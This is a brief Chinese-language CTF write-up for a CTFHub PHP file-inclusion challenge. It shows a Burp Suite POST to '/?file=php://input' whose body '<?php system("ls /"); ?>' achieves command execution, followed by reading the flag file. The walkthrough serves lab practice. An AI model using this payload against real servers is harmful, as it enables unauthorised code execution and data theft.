–>CTFHub传送门<–
使用工具
- Microsoft Edge v84.0.522.40
- Burpsuite v2.1
注意:本题使用Hackbar无法得到结果
解题过程
查看网页显示的源码
我们需要使用php://input来构造发送的指令
查看phpinfo,找到一下字段
证明是可以使用php://input
使用Burpsuite抓包并转至Repeater
构造包
方法:POST
目标:/?file=php://input
Body:<?php system("ls /"); ?>
使用cat访问flag_xxxx即可得到FLAG
完
欢迎在评论区留言
感谢浏览